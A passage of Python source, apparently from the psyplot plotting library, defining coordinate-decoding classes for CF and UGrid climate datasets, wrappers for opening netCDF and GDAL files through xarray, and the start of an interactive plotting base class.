return coord.name
dimlist = list(self.x.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for x coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the last position
if var.dims:
return var.dims[-1]
@docstrings.get_sections(base="CFDecoder.get_y", sections=[
'Parameters', 'Returns'])
@dedent
def get_y(self, var, coords=None):
"""
Get the y-coordinate of a variable
This method searches for the y-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'Y', otherwise it looks whether there is an intersection
between the :attr:`y` attribute and the variables dimensions, otherwise
it returns the coordinate corresponding to the second last dimension of
`var` (or the last if the dimension of var is one-dimensional)
Possible types
--------------
var: xarray.Variable
The variable to get the y-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The y-coordinate or None if it could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'y', coords)
if coord is not None:
return coord
return coords.get(self.get_yname(var))
def get_yname(self, var, coords=None):
"""Get the name of the y-dimension
This method gives the name of the y-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str
The coordinate name
See Also
--------
get_y"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'y', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.y.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for y coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the last or second last
# position
if var.dims:
if self.is_unstructured(var):
return var.dims[-1]
return var.dims[-2 if var.ndim > 1 else -1]
@docstrings.get_sections(base="CFDecoder.get_z", sections=[
'Parameters', 'Returns'])
@dedent
def get_z(self, var, coords=None):
"""
Get the vertical (z-) coordinate of a variable
This method searches for the z-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'Z', otherwise it looks whether there is an intersection
between the :attr:`z` attribute and the variables dimensions, otherwise
it returns the coordinate corresponding to the third last dimension of
`var` (or the second last or last if var is two or one-dimensional)
Possible types
--------------
var: xarray.Variable
The variable to get the z-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The z-coordinate or None if no z coordinate could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'z', coords)
if coord is not None:
return coord
zname = self.get_zname(var)
if zname is not None:
return coords.get(zname)
return None
def get_zname(self, var, coords=None):
"""Get the name of the z-dimension
This method gives the name of the z-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str or None
The coordinate name or None if no vertical coordinate could be
found
See Also
--------
get_z"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'z', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.z.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for z coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return the coordinate in the third last position
if var.dims:
is_unstructured = self.is_unstructured(var)
icheck = -2 if is_unstructured else -3
min_dim = abs(icheck) if 'variable' not in var.dims else abs(icheck-1)
if var.ndim >= min_dim and var.dims[icheck] != self.get_tname(
var, coords):
return var.dims[icheck]
return None
@docstrings.get_sections(base="CFDecoder.get_t", sections=[
'Parameters', 'Returns'])
@dedent
def get_t(self, var, coords=None):
"""
Get the time coordinate of a variable
This method searches for the time coordinate in the :attr:`ds`. It
first checks whether there is one dimension that holds an ``'axis'``
attribute with 'T', otherwise it looks whether there is an intersection
between the :attr:`t` attribute and the variables dimensions, otherwise
it returns the coordinate corresponding to the first dimension of `var`
Possible types
--------------
var: xarray.Variable
The variable to get the time coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The time coordinate or None if no time coordinate could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 't', coords)
if coord is not None:
return coord
dimlist = list(self.t.intersection(var.dims).intersection(coords))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for time coordinate in the "
"variable: %s. I use %s" % (
', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return coords[dimlist[0]]
tname = self.get_tname(var)
if tname is not None:
return coords.get(tname)
return None
def get_tname(self, var, coords=None):
"""Get the name of the t-dimension
This method gives the name of the time dimension
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str or None
The coordinate name or None if no time coordinate could be found
See Also
--------
get_t"""
if coords is not None:
coord = self.get_variable_by_axis(var, 't', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.t.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for t coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return None
return None
def get_idims(self, arr, coords=None):
"""Get the coordinates in the :attr:`ds` dataset as int or slice
This method returns a mapping from the coordinate names of the given
`arr` to an integer, slice or an array of integer that represent the
coordinates in the :attr:`ds` dataset and can be used to extract the
given `arr` via the :meth:`xarray.Dataset.isel` method.
Parameters
----------
arr: xarray.DataArray
The data array for which to get the dimensions as integers, slices
or list of integers from the dataset in the :attr:`base` attribute
coords: iterable
The coordinates to use. If not given all coordinates in the
``arr.coords`` attribute are used
Returns
-------
dict
Mapping from coordinate name to integer, list of integer or slice
See Also
--------
xarray.Dataset.isel, InteractiveArray.idims"""
if coords is None:
coords = arr.coords
else:
coords = {
label: coord for label, coord in six.iteritems(arr.coords)
if label in coords}
ret = self.get_coord_idims(coords)
# handle the coordinates that are not in the dataset
missing = set(arr.dims).difference(ret)
if missing:
warn('Could not get slices for the following dimensions: %r' % (
missing, ), PsyPlotRuntimeWarning)
return ret
def get_coord_idims(self, coords):
"""Get the slicers for the given coordinates from the base dataset
This method converts `coords` to slicers (list of
integers or ``slice`` objects)
Parameters
----------
coords: dict
A subset of the ``ds.coords`` attribute of the base dataset
:attr:`ds`
Returns
-------
dict
Mapping from coordinate name to integer, list of integer or slice
"""
ret = dict(
(label, get_index_from_coord(coord, self.ds.indexes[label]))
for label, coord in six.iteritems(coords)
if label in self.ds.indexes)
return ret
@docstrings.get_sections(base='CFDecoder.get_plotbounds', sections=[
'Parameters', 'Returns'])
@dedent
def get_plotbounds(self, coord, kind=None, ignore_shape=False):
"""
Get the bounds of a coordinate
This method first checks the ``'bounds'`` attribute of the given
`coord` and if it fails, it calculates them.
Parameters
----------
coord: xarray.Coordinate
The coordinate to get the bounds for
kind: str
The interpolation method (see :func:`scipy.interpolate.interp1d`)
that is used in case of a 2-dimensional coordinate
ignore_shape: bool
If True and the `coord` has a ``'bounds'`` attribute, this
attribute is returned without further check. Otherwise it is tried
to bring the ``'bounds'`` into a format suitable for (e.g.) the
:func:`matplotlib.pyplot.pcolormesh` function.
Returns
-------
bounds: np.ndarray
The bounds with the same number of dimensions as `coord` but one
additional array (i.e. if `coord` has shape (4, ), `bounds` will
have shape (5, ) and if `coord` has shape (4, 5), `bounds` will
have shape (5, 6)"""
if 'bounds' in coord.attrs:
bounds = self.ds.coords[coord.attrs['bounds']]
if ignore_shape:
return bounds.values.ravel()
if not bounds.shape[:-1] == coord.shape:
bounds = self.ds.isel(**self.get_idims(coord))
try:
return self._get_plotbounds_from_cf(coord, bounds)
except ValueError as e:
warn((e.message if six.PY2 else str(e)) +
" Bounds are calculated automatically!")
return self._infer_interval_breaks(coord, kind=kind)
@staticmethod
@docstrings.dedent
def _get_plotbounds_from_cf(coord, bounds):
"""
Get plot bounds from the bounds stored as defined by CFConventions
Parameters
----------
coord: xarray.Coordinate
The coordinate to get the bounds for
bounds: xarray.DataArray
The bounds as inferred from the attributes of the given `coord`
Returns
-------
%(CFDecoder.get_plotbounds.returns)s
Notes
-----
this currently only works for rectilinear grids"""
if bounds.shape[:-1] != coord.shape or bounds.shape[-1] != 2:
raise ValueError(
"Cannot interprete bounds with shape {0} for {1} "
"coordinate with shape {2}.".format(
bounds.shape, coord.name, coord.shape))
ret = np.zeros(tuple(map(lambda i: i+1, coord.shape)))
ret[tuple(map(slice, coord.shape))] = bounds[..., 0]
last_slices = tuple(slice(-1, None) for _ in coord.shape)
ret[last_slices] = bounds[tuple(chain(last_slices, [1]))]
return ret
docstrings.keep_params('CFDecoder._check_unstructured_bounds.parameters',
'nans')
@docstrings.get_sections(base='CFDecoder.get_triangles', sections=[
'Parameters', 'Returns'])
@docstrings.dedent
def get_triangles(self, var, coords=None, convert_radian=True,
copy=False, src_crs=None, target_crs=None,
nans=None, stacklevel=1):
"""
Get the triangles for the variable
Parameters
----------
var: xarray.Variable or xarray.DataArray
The variable to use
coords: dict
Alternative coordinates to use. If None, the coordinates of the
:attr:`ds` dataset are used
convert_radian: bool
If True and the coordinate has units in 'radian', those are
converted to degrees
copy: bool
If True, vertice arrays are copied
src_crs: cartopy.crs.Crs
The source projection of the data. If not None, a transformation
to the given `target_crs` will be done
target_crs: cartopy.crs.Crs
The target projection for which the triangles shall be transformed.
Must only be provided if the `src_crs` is not None.
%(CFDecoder._check_unstructured_bounds.parameters.nans)s
Returns
-------
matplotlib.tri.Triangulation
The spatial triangles of the variable
Raises
------
ValueError
If `src_crs` is not None and `target_crs` is None"""
warn("The 'get_triangles' method is depreceated and will be removed "
"soon! Use the 'get_cell_node_coord' method!",
DeprecationWarning, stacklevel=stacklevel)
from matplotlib.tri import Triangulation
def get_vertices(axis):
bounds = self._check_unstructured_bounds(var, coords=coords,
axis=axis, nans=nans)[1]
if coords is not None:
bounds = coords.get(bounds.name, bounds)
vertices = bounds.values.ravel()
if convert_radian:
coord = getattr(self, 'get_' + axis)(var)
if coord.attrs.get('units') == 'radian':
vertices = vertices * 180. / np.pi
return vertices if not copy else vertices.copy()
if coords is None:
coords = self.ds.coords
xvert = get_vertices('x')
yvert = get_vertices('y')
if src_crs is not None and src_crs != target_crs:
if target_crs is None:
raise ValueError(
"Found %s for the source crs but got None for the "
"target_crs!" % (src_crs, ))
arr = target_crs.transform_points(src_crs, xvert, yvert)
xvert = arr[:, 0]
yvert = arr[:, 1]
triangles = np.reshape(range(len(xvert)), (len(xvert) // 3, 3))
return Triangulation(xvert, yvert, triangles)
docstrings.delete_params(
'CFDecoder.get_plotbounds.parameters', 'ignore_shape')
@staticmethod
def _infer_interval_breaks(coord, kind=None):
"""
Interpolate the bounds from the data in coord
Parameters
----------
%(CFDecoder.get_plotbounds.parameters.no_ignore_shape)s
Returns
-------
%(CFDecoder.get_plotbounds.returns)s
Notes
-----
this currently only works for rectilinear grids"""
if coord.ndim == 1:
return _infer_interval_breaks(coord)
elif coord.ndim == 2:
from scipy.interpolate import interp2d
kind = kind or rcParams['decoder.interp_kind']
y, x = map(np.arange, coord.shape)
new_x, new_y = map(_infer_interval_breaks, [x, y])
coord = np.asarray(coord)
return interp2d(x, y, coord, kind=kind, copy=False)(new_x, new_y)
@classmethod
@docstrings.get_sections(base='CFDecoder._decode_ds')
@docstrings.dedent
def _decode_ds(cls, ds, gridfile=None, decode_coords=True,
decode_times=True):
"""
Static method to decode coordinates and time informations
This method interpretes absolute time informations (stored with units
``'day as %Y%m%d.%f'``) and coordinates
Parameters
----------
%(CFDecoder.decode_coords.parameters)s
decode_times : bool, optional
If True, decode times encoded in the standard NetCDF datetime
format into datetime objects. Otherwise, leave them encoded as
numbers.
decode_coords : bool, optional
If True, decode the 'coordinates' attribute to identify coordinates
in the resulting dataset."""
if decode_coords:
ds = cls.decode_coords(ds, gridfile=gridfile)
if decode_times:
for k, v in six.iteritems(ds.variables):
# check for absolute time units and make sure the data is not
# already decoded via dtype check
if v.attrs.get('units', '') == 'day as %Y%m%d.%f' and (
np.issubdtype(v.dtype, np.float64)):
decoded = xr.Variable(
v.dims, AbsoluteTimeDecoder(v), attrs=v.attrs,
encoding=v.encoding)
ds.update({k: decoded})
return ds
@classmethod
@docstrings.dedent
def decode_ds(cls, ds, *args, **kwargs):
"""
Static method to decode coordinates and time informations
This method interpretes absolute time informations (stored with units
``'day as %Y%m%d.%f'``) and coordinates
Parameters
----------
%(CFDecoder._decode_ds.parameters)s
Returns
-------
xarray.Dataset
The decoded dataset"""
for decoder_cls in cls._registry + [CFDecoder]:
ds = decoder_cls._decode_ds(ds, *args, **kwargs)
return ds
def correct_dims(self, var, dims={}, remove=True):
"""Expands the dimensions to match the dims in the variable
Parameters
----------
var: xarray.Variable
The variable to get the data for
dims: dict
a mapping from dimension to the slices
remove: bool
If True, dimensions in `dims` that are not in the dimensions of
`var` are removed"""
method_mapping = {'x': self.get_xname,
'z': self.get_zname, 't': self.get_tname}
dims = dict(dims)
if self.is_unstructured(var): # we assume a one-dimensional grid
method_mapping['y'] = self.get_xname
else:
method_mapping['y'] = self.get_yname
for key in six.iterkeys(dims.copy()):
if key in method_mapping and key not in var.dims:
dim_name = method_mapping[key](var, self.ds.coords)
if dim_name in dims:
dims.pop(key)
else:
new_name = method_mapping[key](var)
if new_name is not None:
dims[new_name] = dims.pop(key)
# now remove the unnecessary dimensions
if remove:
for key in set(dims).difference(var.dims):
dims.pop(key)
self.logger.debug(
"Could not find a dimensions matching %s in variable %s!",
key, var)
return dims
def standardize_dims(self, var, dims={}):
"""Replace the coordinate names through x, y, z and t
Parameters
----------
var: xarray.Variable
The variable to use the dimensions of
dims: dict
The dictionary to use for replacing the original dimensions
Returns
-------
dict
The dictionary with replaced dimensions"""
dims = dict(dims)
name_map = {self.get_xname(var, self.ds.coords): 'x',
self.get_yname(var, self.ds.coords): 'y',
self.get_zname(var, self.ds.coords): 'z',
self.get_tname(var, self.ds.coords): 't'}
dims = dict(dims)
for dim in set(dims).intersection(name_map):
dims[name_map[dim]] = dims.pop(dim)
return dims
class UGridDecoder(CFDecoder):
"""
Decoder for UGrid data sets
Warnings
--------
Currently only triangles are supported."""
def is_unstructured(self, *args, **kwargs):
"""Reimpletemented to return always True. Any ``*args`` and ``**kwargs``
are ignored"""
return True
def get_mesh(self, var, coords=None):
"""Get the mesh variable for the given `var`
Parameters
----------
var: xarray.Variable
The data source whith the ``'mesh'`` attribute
coords: dict
The coordinates to use. If None, the coordinates of the dataset of
this decoder is used
Returns
-------
xarray.Coordinate
The mesh coordinate"""
mesh = var.attrs.get('mesh')
if mesh is None:
return None
if coords is None:
coords = self.ds.coords
return coords.get(mesh, self.ds.coords.get(mesh))
@classmethod
@docstrings.dedent
def can_decode(cls, ds, var):
"""
Check whether the given variable can be decoded.
Returns True if a mesh coordinate could be found via the
:meth:`get_mesh` method
Parameters
----------
%(CFDecoder.can_decode.parameters)s
Returns
-------
%(CFDecoder.can_decode.returns)s"""
return cls(ds).get_mesh(var) is not None
@docstrings.dedent
def get_triangles(self, var, coords=None, convert_radian=True, copy=False,
src_crs=None, target_crs=None, nans=None, stacklevel=1):
"""
Get the of the given coordinate.
Parameters
----------
%(CFDecoder.get_triangles.parameters)s
Returns
-------
%(CFDecoder.get_triangles.returns)s
Notes
-----
If the ``'location'`` attribute is set to ``'node'``, a delaunay
triangulation is performed using the
:class:`matplotlib.tri.Triangulation` class.
.. todo::
Implement the visualization for UGrid data shown on the edge of the
triangles"""
warn("The 'get_triangles' method is depreceated and will be removed "
"soon! Use the 'get_cell_node_coord' method!",
DeprecationWarning, stacklevel=stacklevel)
from matplotlib.tri import Triangulation
if coords is None:
coords = self.ds.coords
def get_coord(coord):
return coords.get(coord, self.ds.coords.get(coord))
mesh = self.get_mesh(var, coords)
nodes = self.get_nodes(mesh, coords)
if any(n is None for n in nodes):
raise ValueError("Could not find the nodes variables!")
xvert, yvert = nodes
xvert = xvert.values
yvert = yvert.values
loc = var.attrs.get('location', 'face')
if loc == 'face':
triangles = get_coord(
mesh.attrs.get('face_node_connectivity', '')).values
if triangles is None:
raise ValueError(
"Could not find the connectivity information!")
elif loc == 'node':
triangles = None
else:
raise ValueError(
"Could not interprete location attribute (%s) of mesh "
"variable %s!" % (loc, mesh.name))
if convert_radian:
for coord in nodes:
if coord.attrs.get('units') == 'radian':
coord = coord * 180. / np.pi
if src_crs is not None and src_crs != target_crs:
if target_crs is None:
raise ValueError(
"Found %s for the source crs but got None for the "
"target_crs!" % (src_crs, ))
xvert = xvert[triangles].ravel()
yvert = yvert[triangles].ravel()
arr = target_crs.transform_points(src_crs, xvert, yvert)
xvert = arr[:, 0]
yvert = arr[:, 1]
if loc == 'face':
triangles = np.reshape(range(len(xvert)), (len(xvert) // 3,
3))
return Triangulation(xvert, yvert, triangles)
@docstrings.dedent
def get_cell_node_coord(self, var, coords=None, axis='x', nans=None):
"""
Checks whether the bounds in the variable attribute are triangular
Parameters
----------
%(CFDecoder.get_cell_node_coord.parameters)s
Returns
-------
%(CFDecoder.get_cell_node_coord.returns)s"""
if coords is None:
coords = self.ds.coords
idims = self.get_coord_idims(coords)
def get_coord(coord):
coord = coords.get(coord, self.ds.coords.get(coord))
return coord.isel(**{d: sl for d, sl in idims.items()
if d in coord.dims})
mesh = self.get_mesh(var, coords)
if mesh is None:
return
nodes = self.get_nodes(mesh, coords)
if not len(nodes):
raise ValueError("Could not find the nodes variables for the %s "
"coordinate!" % axis)
vert = nodes[0 if axis == 'x' else 1]
if vert is None:
raise ValueError("Could not find the nodes variables for the %s "
"coordinate!" % axis)
loc = var.attrs.get('location', 'face')
if loc == 'node':
# we assume a triangular grid and use matplotlibs triangulation
from matplotlib.tri import Triangulation
xvert, yvert = nodes
triangles = Triangulation(xvert, yvert)
if axis == 'x':
bounds = triangles.x[triangles.triangles]
else:
bounds = triangles.y[triangles.triangles]
elif loc in ['edge', 'face']:
connectivity = get_coord(
mesh.attrs.get('%s_node_connectivity' % loc, ''))
if connectivity is None:
raise ValueError(
"Could not find the connectivity information!")
connectivity = connectivity.values
bounds = vert.values[
np.where(np.isnan(connectivity), connectivity[:, :1],
connectivity).astype(int)]
else:
raise ValueError(
"Could not interprete location attribute (%s) of mesh "
"variable %s!" % (loc, mesh.name))
dim0 = '__face' if loc == 'node' else var.dims[-1]
return xr.DataArray(
bounds,
coords={key: val for key, val in coords.items()
if (dim0, ) == val.dims},
dims=(dim0, '__bnds', ),
name=vert.name + '_bnds', attrs=vert.attrs.copy())
@staticmethod
@docstrings.dedent
def decode_coords(ds, gridfile=None):
"""
Reimplemented to set the mesh variables as coordinates
Parameters
----------
%(CFDecoder.decode_coords.parameters)s
Returns
-------
%(CFDecoder.decode_coords.returns)s"""
extra_coords = set(ds.coords)
for var in six.itervalues(ds.variables):
if 'mesh' in var.attrs:
mesh = var.attrs['mesh']
if mesh not in extra_coords:
extra_coords.add(mesh)
try:
mesh_var = ds.variables[mesh]
except KeyError:
warn('Could not find mesh variable %s' % mesh)
continue
if 'node_coordinates' in mesh_var.attrs:
extra_coords.update(
mesh_var.attrs['node_coordinates'].split())
if 'face_node_connectivity' in mesh_var.attrs:
extra_coords.add(
mesh_var.attrs['face_node_connectivity'])
if gridfile is not None and not isinstance(gridfile, xr.Dataset):
gridfile = open_dataset(gridfile)
ds.update({k: v for k, v in six.iteritems(gridfile.variables)
if k in extra_coords})
if xr_version < (0, 11):
ds.set_coords(extra_coords.intersection(ds.variables),
inplace=True)
else:
ds._coord_names.update(extra_coords.intersection(ds.variables))
return ds
def get_nodes(self, coord, coords):
"""Get the variables containing the definition of the nodes
Parameters
----------
coord: xarray.Coordinate
The mesh variable
coords: dict
The coordinates to use to get node coordinates"""
def get_coord(coord):
return coords.get(coord, self.ds.coords.get(coord))
return list(map(get_coord,
coord.attrs.get('node_coordinates', '').split()[:2]))
@docstrings.dedent
def get_x(self, var, coords=None):
"""
Get the centers of the triangles in the x-dimension
Parameters
----------
%(CFDecoder.get_y.parameters)s
Returns
-------
%(CFDecoder.get_y.returns)s"""
if coords is None:
coords = self.ds.coords
# first we try the super class
ret = super(UGridDecoder, self).get_x(var, coords)
# but if that doesn't work because we get the variable name in the
# dimension of `var`, we use the means of the triangles
if ret is None or ret.name in var.dims or (hasattr(var, 'mesh') and
ret.name == var.mesh):
bounds = self.get_cell_node_coord(var, axis='x', coords=coords)
if bounds is not None:
centers = bounds.mean(axis=-1)
x = self.get_nodes(self.get_mesh(var, coords), coords)[0]
try:
cls = xr.IndexVariable
except AttributeError: # xarray < 0.9
cls = xr.Coordinate
return cls(x.name, centers, attrs=x.attrs.copy())
else:
return ret
@docstrings.dedent
def get_y(self, var, coords=None):
"""
Get the centers of the triangles in the y-dimension
Parameters
----------
%(CFDecoder.get_y.parameters)s
Returns
-------
%(CFDecoder.get_y.returns)s"""
if coords is None:
coords = self.ds.coords
# first we try the super class
ret = super(UGridDecoder, self).get_y(var, coords)
# but if that doesn't work because we get the variable name in the
# dimension of `var`, we use the means of the triangles
if ret is None or ret.name in var.dims or (hasattr(var, 'mesh') and
ret.name == var.mesh):
bounds = self.get_cell_node_coord(var, axis='y', coords=coords)
if bounds is not None:
centers = bounds.mean(axis=-1)
y = self.get_nodes(self.get_mesh(var, coords), coords)[1]
try:
cls = xr.IndexVariable
except AttributeError: # xarray < 0.9
cls = xr.Coordinate
return cls(y.name, centers, attrs=y.attrs.copy())
else:
return ret
# register the UGridDecoder
CFDecoder.register_decoder(UGridDecoder)
docstrings.keep_params('CFDecoder.decode_coords.parameters', 'gridfile')
docstrings.get_sections(inspect.cleandoc(
xr.open_dataset.__doc__.split('\n', 1)[1]),
'xarray.open_dataset')
docstrings.delete_params('xarray.open_dataset.parameters', 'engine')
@docstrings.get_sections(base='open_dataset')
@docstrings.dedent
def open_dataset(filename_or_obj, decode_cf=True, decode_times=True,
decode_coords=True, engine=None, gridfile=None, **kwargs):
"""
Open an instance of :class:`xarray.Dataset`.
This method has the same functionality as the :func:`xarray.open_dataset`
method except that is supports an additional 'gdal' engine to open
gdal Rasters (e.g. GeoTiffs) and that is supports absolute time units like
``'day as %Y%m%d.%f'`` (if `decode_cf` and `decode_times` are True).
Parameters
----------
%(xarray.open_dataset.parameters.no_engine)s
engine: {'netcdf4', 'scipy', 'pydap', 'h5netcdf', 'gdal'}, optional
Engine to use when reading netCDF files. If not provided, the default
engine is chosen based on available dependencies, with a preference for
'netcdf4'.
%(CFDecoder.decode_coords.parameters.gridfile)s
Returns
-------
xarray.Dataset
The dataset that contains the variables from `filename_or_obj`"""
# use the absolute path name (is saver when saving the project)
if isstring(filename_or_obj) and osp.exists(filename_or_obj):
filename_or_obj = osp.abspath(filename_or_obj)
if engine == 'gdal':
from psyplot.gdal_store import GdalStore
filename_or_obj = GdalStore(filename_or_obj)
engine = None
ds = xr.open_dataset(filename_or_obj, decode_cf=decode_cf,
decode_coords=False, engine=engine,
decode_times=decode_times, **kwargs)
if isstring(filename_or_obj):
ds.psy.filename = filename_or_obj
if decode_cf:
ds = CFDecoder.decode_ds(
ds, decode_coords=decode_coords, decode_times=decode_times,
gridfile=gridfile)
return ds
docstrings.get_sections(
inspect.cleandoc(xr.open_mfdataset.__doc__.split('\n', 1)[1]),
'xarray.open_mfdataset')
docstrings.delete_params('xarray.open_mfdataset.parameters', 'engine')
docstrings.keep_params('get_tdata.parameters', 't_format')
docstrings.params['xarray.open_mfdataset.parameters.no_engine'] = \
docstrings.params['xarray.open_mfdataset.parameters.no_engine'].replace(
'**kwargs', '``**kwargs``').replace('"path/to/my/files/*.nc"',
'``"path/to/my/files/*.nc"``')
docstrings.keep_params('open_dataset.parameters', 'engine')
@docstrings.dedent
def open_mfdataset(paths, decode_cf=True, decode_times=True,
decode_coords=True, engine=None, gridfile=None,
t_format=None, **kwargs):
"""
Open multiple files as a single dataset.
This function is essentially the same as the :func:`xarray.open_mfdataset`
function but (as the :func:`open_dataset`) supports additional decoding
and the ``'gdal'`` engine.
You can further specify the `t_format` parameter to get the time
information from the files and use the results to concatenate the files
Parameters
----------
%(xarray.open_mfdataset.parameters.no_engine)s
%(open_dataset.parameters.engine)s
%(get_tdata.parameters.t_format)s
%(CFDecoder.decode_coords.parameters.gridfile)s
Returns
-------
xarray.Dataset
The dataset that contains the variables from `filename_or_obj`"""
if t_format is not None or engine == 'gdal':
if isinstance(paths, six.string_types):
paths = sorted(glob(paths))
if not paths:
raise IOError('no files to open')
if t_format is not None:
time, paths = get_tdata(t_format, paths)
kwargs['concat_dim'] = 'time'
if xr_version > (0, 11):
kwargs['combine'] = 'nested'
if all(map(isstring, paths)):
filenames = list(paths)
else:
filenames = None
if engine == 'gdal':
from psyplot.gdal_store import GdalStore
paths = list(map(GdalStore, paths))
engine = None
if xr_version < (0, 18):
kwargs['lock'] = False
ds = xr.open_mfdataset(
paths, decode_cf=decode_cf, decode_times=decode_times, engine=engine,
decode_coords=False, **kwargs)
ds.psy.filename = filenames
if decode_cf:
ds = CFDecoder.decode_ds(ds, gridfile=gridfile,
decode_coords=decode_coords,
decode_times=decode_times)
ds.psy._concat_dim = kwargs.get('concat_dim')
ds.psy._combine = kwargs.get('combine')
if t_format is not None:
ds['time'] = time
return ds
class InteractiveBase(object):
"""Class for the communication of a data object with a suitable plotter
This class serves as an interface for data objects (in particular as a
base for :class:`InteractiveArray` and :class:`InteractiveList`) to
communicate with the corresponding :class:`~psyplot.plotter.Plotter` in the
:attr:`plotter` attribute"""
#: The :class:`psyplot.project.DataArrayPlotter`
_plot = None
@property
def plotter(self):
""":class:`psyplot.plotter.Plotter` instance that makes the interactive
plotting of the data"""
return self._plotter
@plotter.setter
def plotter(self, value):
self._plotter = value
@plotter.deleter
def plotter(self):
self._plotter = None
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@property
def plot(self):
"""An object to visualize this data object
To make a 2D-plot with the :mod:`psy-simple <psy_simple.plugin>`
plugin, you can just type
.. code-block:: python
plotter = da.psy.plot.plot2d()
It will create a new :class:`psyplot.plotter.Plotter` instance with the
extracted and visualized data.
See Also
--------
psyplot.project.DataArrayPlotter: for the different plot methods"""
if self._plot is None:
import psyplot.project as psy
self._plot = psy.DataArrayPlotter(self)
return self._plot
@no_auto_update.setter
def no_auto_update(self, value):
if self.plotter is not None:
self.plotter.no_auto_update = value
self.no_auto_update.value = bool(value)
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s.%s' % (self.__module__, self.__class__.__name__,
self.arr_name)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
@property
def ax(self):
"""The matplotlib axes the plotter of this data object plots on"""
return None if self.plotter is None else self.plotter.ax
@ax.setter
def ax(self, value):
if self.plotter is None:
raise ValueError(
'Cannot set the axes because the plotter attribute is None!')
self.plotter.ax = value
block_signals = utils._temp_bool_prop(
'block_signals', "Block the emitting of signals of this instance")
# -------------------------------------------------------------------------
# -------------------------------- SIGNALS --------------------------------
# -------------------------------------------------------------------------
#: :class:`Signal` to be emitted when the object has been updated
onupdate = Signal('_onupdate')
_onupdate = None
_plotter = None
@property
@docstrings.get_docstring(base='InteractiveBase._njobs')
@dedent
def _njobs(self):
"""
The number of jobs taken from the queue during an update process
Returns
-------
list of int
The length of the list determines the number of neccessary queues,
the numbers in the list determines the number of tasks per queue
this instance fullfills during the update process"""
return self.plotter._njobs if self.plotter is not None else []
@property
def arr_name(self):
""":class:`str`. The internal name of the :class:`InteractiveBase`"""
return self._arr_name
@arr_name.setter
def arr_name(self, value):
self._arr_name = value
try:
del self._logger
except AttributeError:
pass
self.onupdate.emit()
_arr_name = None
_no_auto_update = None
@docstrings.get_sections(base='InteractiveBase')
@dedent
def __init__(self, plotter=None, arr_name='arr0', auto_update=None):
"""
Parameters
----------
plotter: Plotter
Default: None. Interactive plotter that makes the plot via
formatoption keywords.
arr_name: str
Default: ``'data'``. unique string of the array
auto_update: bool
Default: None. A boolean indicating whether this list shall
automatically update the contained arrays when calling the
:meth:`update` method or not. See also the :attr:`no_auto_update`
attribute. If None, the value from the ``'lists.auto_update'``
key in the :attr:`psyplot.rcParams` dictionary is used."""
self.plotter = plotter
self.arr_name = arr_name
if auto_update is None:
auto_update = rcParams['lists.auto_update']
self.no_auto_update = not bool(auto_update)
self.replot = False
def _finish_all(self, queues):
for n, queue in zip(safe_list(self._njobs), safe_list(queues)):
if queue is not None:
for i in range(n):
queue.task_done()
@docstrings.get_sections(base='InteractiveBase._register_update')
@dedent
def _register_update(self, replot=False, fmt={}, force=False,
todefault=False):
"""
Register new formatoptions for updating
Parameters
----------
replot: bool
Boolean that determines whether the data specific formatoptions
shall be updated in any case or not. Note, if `dims` is not empty
or any coordinate keyword is in ``**kwargs``, this will be set to
True automatically
fmt: dict
Keys may be any valid formatoption of the formatoptions in the
:attr:`plotter`
force: str, list of str or bool
If formatoption key (i.e. string) or list of formatoption keys,
thery are definitely updated whether they changed or not.
If True, all the given formatoptions in this call of the are
:meth:`update` method are updated
todefault: bool
If True, all changed formatoptions (except the registered ones)
are updated to their default value as stored in the
:attr:`~psyplot.plotter.Plotter.rc` attribute
See Also
--------
start_update"""
self.replot = self.replot or replot
if self.plotter is not None:
self.plotter._register_update(replot=self.replot, fmt=fmt,
force=force, todefault=todefault)
